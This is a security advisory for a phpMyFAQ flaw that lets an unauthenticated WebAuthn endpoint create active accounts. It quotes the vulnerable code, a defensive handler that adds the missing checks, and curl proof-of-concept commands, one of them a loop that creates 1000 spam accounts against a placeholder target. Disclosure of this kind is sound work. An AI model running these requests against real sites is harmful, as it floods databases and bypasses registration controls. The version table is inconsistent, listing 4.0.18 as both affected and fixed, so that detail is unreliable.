7.5
phpMyFAQ Allows Unauthenticated User Account Creation
CVE-2026-27836
GHSA-w22q-m2fm-x9f4
Summary
Unauthenticated attackers can create unlimited user accounts, even if registration is disabled. This is a security risk because it allows anyone to create new accounts without verifying their identity. To fix this, update phpMyFAQ to the latest version, which includes a patch for this issue.
What to do
- Update thorsten phpmyfaq to version 4.0.18.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| thorsten | phpmyfaq | <= 4.0.18 | 4.0.18 |
| phpmyfaq | phpmyfaq | <= 4.0.18 | – |
Original title
phpMyFAQ Allows Unauthenticated Account Creation via WebAuthn Prepare Endpoint
Original description
### Summary
The WebAuthn prepare endpoint (`/api/webauthn/prepare`) creates new active user accounts without any authentication, CSRF protection, CAPTCHA, or configuration checks. This allows unauthenticated attackers to create unlimited user accounts even when registration is disabled.
### Details
**File:** `phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/WebAuthnController.php`, lines 63-79
```php
#[Route(path: 'webauthn/prepare', name: 'api.private.webauthn.prepare', methods: ['POST'])]
public function prepare(Request $request): JsonResponse
{
$data = json_decode($request->getContent(), ...);
$username = Filter::filterVar($data->username, FILTER_SANITIZE_SPECIAL_CHARS);
// No check of security.enableWebAuthnSupport, security.enableRegistration,
// the CSRF token, a captcha or a rate limit happens before this point.
if (!$this->user->getUserByLogin($username, raiseError: false)) {
try {
$this->user->createUser($username);
$this->user->setStatus(status: 'active'); // new account is immediately active
$this->user->setAuthSource(AuthenticationSourceType::AUTH_WEB_AUTHN->value);
$this->user->setUserData([
'display_name' => $username,
'email' => $username,
]);
// ... (excerpt ends here; the rest of the method is not shown in the advisory)
```
The endpoint:
1. Accepts any POST request with a JSON `username` field
2. If the username doesn't exist, creates a new **active** user account
3. Does NOT check if WebAuthn support is enabled (`security.enableWebAuthnSupport`)
4. Does NOT check if registration is enabled (`security.enableRegistration`)
5. Does NOT verify CSRF tokens
6. Does NOT require captcha validation
7. Has no rate limiting
### PoC
```bash
# Create an account - no auth needed
curl -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d '{"username":"attacker_account"}'
# Mass account creation (the closing quote of the username was missing in the original JSON)
for i in $(seq 1 1000); do
curl -s -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d "{\"username\":\"spam_user_$i\"}" &
done
wait
```
### Impact
- **Registration bypass:** Accounts created even when self-registration is disabled
- **Username squatting:** Reserve usernames before legitimate users
- **Database exhaustion:** Create millions of fake active accounts (DoS)
- **User enumeration:** Different responses for existing vs new usernames
- **Security control bypass:** WebAuthn config check is bypassed entirely
All phpMyFAQ installations with the WebAuthn controller routed (default) are affected, regardless of configuration settings.
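As an added illustration (this is not phpMyFAQ's code and not the upstream patch), the handler below applies, in order, the checks the Details list reports as missing and returns the same outcome whether or not the username already exists, which addresses the "User enumeration" item under Impact. Only the two configuration key names (`security.enableWebAuthnSupport`, `security.enableRegistration`) come from the advisory; the class names, method names, the CSRF, captcha and rate-limit collaborators, and the sample request are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added example, not phpMyFAQ code. Every class and method name here is
// invented for illustration; only the two security.* config keys are from
// the advisory.

enum PrepareOutcome: string
{
    case Disabled        = 'disabled';          // feature switched off (HTTP 403/404)
    case BadCsrf         = 'bad_csrf';          // HTTP 403
    case CaptchaFailed   = 'captcha_failed';    // HTTP 400
    case RateLimited     = 'rate_limited';      // HTTP 429
    case InvalidUsername = 'invalid_username';  // HTTP 400
    case Accepted        = 'accepted';          // HTTP 200, challenge issued
}

/** Minimal in-memory user store standing in for the real one (assumed). */
final class UserStore
{
    /** @var array<string, true> */
    private array $users = [];
    public function exists(string $login): bool { return isset($this->users[$login]); }
    public function create(string $login): void { $this->users[$login] = true; }
    public function count(): int { return count($this->users); }
}

/** Fixed-window counter: at most $max calls per client per $windowSeconds. */
final class RateLimiter
{
    /** @var array<string, array{int, int}> client key => [window start, hits] */
    private array $buckets = [];
    public function __construct(private int $max, private int $windowSeconds) {}
    public function allow(string $key, int $now): bool
    {
        [$start, $hits] = $this->buckets[$key] ?? [$now, 0];
        if ($now - $start >= $this->windowSeconds) { $start = $now; $hits = 0; }
        $hits++;
        $this->buckets[$key] = [$start, $hits];
        return $hits <= $this->max;
    }
}

final class WebAuthnPrepareGuard
{
    /** @param array<string, bool> $config settings keyed like phpMyFAQ's security.* options */
    public function __construct(
        private array $config,
        private UserStore $users,
        private RateLimiter $limiter,
    ) {}

    public function prepare(array $body, string $sessionCsrf, bool $captchaPassed, string $clientIp, int $now): PrepareOutcome
    {
        // 1. Feature flag first: a disabled feature must never create state.
        if (($this->config['security.enableWebAuthnSupport'] ?? false) !== true) {
            return PrepareOutcome::Disabled;
        }
        // 2. CSRF: token must match the one bound to the session, compared in constant time.
        if (!hash_equals($sessionCsrf, (string) ($body['csrf'] ?? ''))) {
            return PrepareOutcome::BadCsrf;
        }
        // 3. Captcha, so that each request costs something to automate.
        if (!$captchaPassed) {
            return PrepareOutcome::CaptchaFailed;
        }
        // 4. Per-client rate limit, evaluated before any database write.
        if (!$this->limiter->allow($clientIp, $now)) {
            return PrepareOutcome::RateLimited;
        }
        // 5. Validate the username instead of merely sanitising it.
        $username = (string) ($body['username'] ?? '');
        if (preg_match('/\A[a-z0-9._-]{3,64}\z/i', $username) !== 1) {
            return PrepareOutcome::InvalidUsername;
        }
        // 6. Create an account only when self-registration is enabled. The
        //    outcome is identical whether the user existed or not, so the
        //    response does not reveal which usernames are taken.
        $registrationEnabled = ($this->config['security.enableRegistration'] ?? false) === true;
        if ($registrationEnabled && !$this->users->exists($username)) {
            $this->users->create($username);
        }
        return PrepareOutcome::Accepted;
    }
}

// Usage with a constructed request: WebAuthn on, self-registration off.
$store = new UserStore();
$guard = new WebAuthnPrepareGuard(
    ['security.enableWebAuthnSupport' => true, 'security.enableRegistration' => false],
    $store,
    new RateLimiter(max: 5, windowSeconds: 60),
);
$outcome = $guard->prepare(['username' => 'newuser', 'csrf' => 'tok'], 'tok', true, '203.0.113.9', time());
printf("%s, accounts created: %d\n", $outcome->value, $store->count());
```

With registration disabled the sample call returns `accepted` while the store stays empty, which is the behaviour the vulnerable handler lacks: the caller learns nothing about existing usernames and cannot create an account. Flipping `security.enableRegistration` to `true` creates the account on the first call and is a no-op on repeats, and the sixth call from the same client within the window is refused by the rate limiter before anything is written.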
NVD CVSS 3.1 score: 7.5
Vulnerability type: CWE-862 Missing Authorization
Published: 27 Feb 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026